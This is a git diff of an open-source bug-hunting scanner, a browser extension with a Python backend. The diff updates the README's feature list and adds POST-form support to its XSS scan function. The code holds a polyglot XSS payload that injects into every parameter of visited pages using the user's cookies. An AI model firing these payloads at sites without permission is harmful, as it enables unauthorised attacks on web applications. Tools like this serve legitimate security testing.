diff --git a/README.md b/README.md
index 1e09afd..7f8760d 100755
--- a/README.md
+++ b/README.md
@@ -8,6 +8,18 @@ Currently it scans for:
 - Local File Inclusion
 - Remote Commands Execution
 
+All the features are:
+- Detect if the server is up
+- Start/Stop button
+- New XSS vectors, work in different contexts (JS var, JS function, inside HTML tag, outside HTML tag)
+- Basic page to list the vulnerabilities URL and TYPE
+- Time based SQLi scanner using polyglot vectors (MySQL, SQLite, Oracle, Postgresql, SQL Server)
+- RCE scanner using polyglot vectors based on time
+- New logo for the extension
+- Re-use your cookies and user-agent to get access to page with cookie-authentication 
+- Export vulnerabilities into a CSV file
+- Launch scan when a form is submitted or a page is opened via the URL bar
+
 **Warnings :** Do not use this extension for illegal purpose, the main goal of it is to simplify the life of bug hunters. It's a **BETA version**, many improvements will come don't worry
 
 ## Install
@@ -36,22 +48,6 @@ var config_server = "http://127.0.0.1:8000";
 4 - Browse the internet ! (Don't forget to start the extension by clicking the 'START' button)
 You can try the Error SQL, Blind SQL, LFI with Damn Vulnerable Web App 
 
-## New features
-- Detect if the server is up
-- Start/Stop button
-- New XSS vectors, work in different contexts (JS var, JS function, inside HTML tag, outside HTML tag)
-- Basic page to list the vulnerabilities URL and TYPE
-- Time based SQLi scanner using polyglot vectors (MySQL, SQLite, Oracle, Postgresql, SQL Server)
-- RCE scanner using polyglot vectors based on time
-- New logo for the extension
-- Re-use your cookies and user-agent to get access to page with cookie-authentication 
-- Export vulnerabilities into a CSV file
-- Launch scan when a form is submitted or a page is opened via the URL bar
-
-## TODO - Work in progress
-- Should detect target in source code.. (list of targets, then launch scan)
-- Do xss for POST with data dict
-
 ## Thanks
 - Polyglot vector for SQL injections [The Ultimate SQL Injection Payload](https://labs.detectify.com/2013/05/29/the-ultimate-sql-injection-payload/)
 - Polyglot vector for XSS injection 1 [One vector to rule them all](http://www.thespanner.co.uk/2010/09/15/one-vector-to-rule-them-all/)
diff --git a/Server/scans.py b/Server/scans.py
index eee88d7..d96b7cd 100644
--- a/Server/scans.py
+++ b/Server/scans.py
@@ -6,21 +6,33 @@ import requests
 import datetime
 import re
 
-"""scan_xss /!\ TODO : POST request (check method, data)
+"""scan_xss 
 Description: inject a polyglot vector for XSS in every parameter, then it checks if an alert was triggered
 Parameters: vulns - list of vulnerabilities, url - address of the target, fuzz - parameter we modify
 """
 def scan_xss(method, vulns, url, fuzz, cookie, useragent, firefox, data):
 	payload = 'jaVasCript:alert(1)//" name=alert(1) onErrOr=eval(name) src=1 autofocus oNfoCus=eval(name)><marquee><img src=x onerror=alert(1)></marquee>" ></textarea\></|\><details/open/ontoggle=prompt`1` ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>\'-->" ></script><sCrIpt>confirm(1)</scRipt>"><img/id="confirm&lpar; 1)"/alt="/"src="/"onerror=eval(id&%23x29;>\'"><!--'
-	payload1 = 'javascript:/*-->]]>%>?></script></title></textarea></noscript></style></xmp>">[img=1,name=/alert(1)/.source]<img -/style=a:expression&#40&#47&#42\'/-/*&#39,/**/eval(name)/*%2A///*///&#41;;width:100%;height:100%;position:absolute;-ms-behavior:url(#default#time2) name=alert(1) onerror=eval(name) src=1 autofocus onfocus=eval(name) onclick=eval(name) onmouseover=eval(name) onbegin=eval(name) background=javascript:eval(name)//>"'
-
+	print repr(fuzz),"fuzz"
 	try:	
 		with firefox.start() as session:
-		
-			# Send GET XSS
-			inject = url.replace(fuzz+"=", fuzz+"="+payload)
-			page, extra_resources = session.open(inject, headers={'Cookie':cookie}, user_agent=useragent)
-			result, resources = session.wait_for_alert(1)
+
+			# POST
+			if (method == 'POST' and fuzz != ''):
+				inject = dict(data)
+				inject[fuzz] = inject[fuzz] + payload 
+				del inject['']
+				page, extra_resources = session.open(url, headers={'Cookie':cookie}, user_agent=useragent)
+				result, resources     = session.fill("form", inject)
+				page, resources       = session.call("form", "submit", expect_loading=True)
+				result, resources     = session.wait_for_alert(1)
+				inject = url + ":" + fuzz + ":" + inject[fuzz]
+
+			# GET
+			if (method == 'GET'):
+				inject                = url.replace(fuzz+"=", fuzz+"="+payload)
+				page, extra_resources = session.open(inject, headers={'Cookie':cookie}, user_agent=useragent)
+				result, resources     = session.wait_for_alert(1)
+
 
 			# Detect XSS result with an alert
 			if result == '1':
@@ -31,7 +43,13 @@ def scan_xss(method, vulns, url, fuzz, cookie, useragent, firefox, data):
 				print "\t\t\033[94mXSS Failed \033[0m for ", fuzz, " with the payload :", payload
 
 	except Exception, e:
-		print "\t\t\033[94mXSS Failed \033[0m for ", fuzz, " with the payload :", payload
+		if "alert" in str(e):
+			print "\t\t\033[93mXSS Detected \033[0m for ", fuzz, " with the payload :", payload
+			inject = url + ":" + fuzz + ":" + payload
+			vulns['xss']  += 1
+			vulns['list'] += 'XSS|TYPE|'+inject+'|DELIMITER|'
+		else:
+			print "\t\t\033[94mXSS Failed \033[0m for ", fuzz, " with the payload :", payload
 
 
 """scan_sql
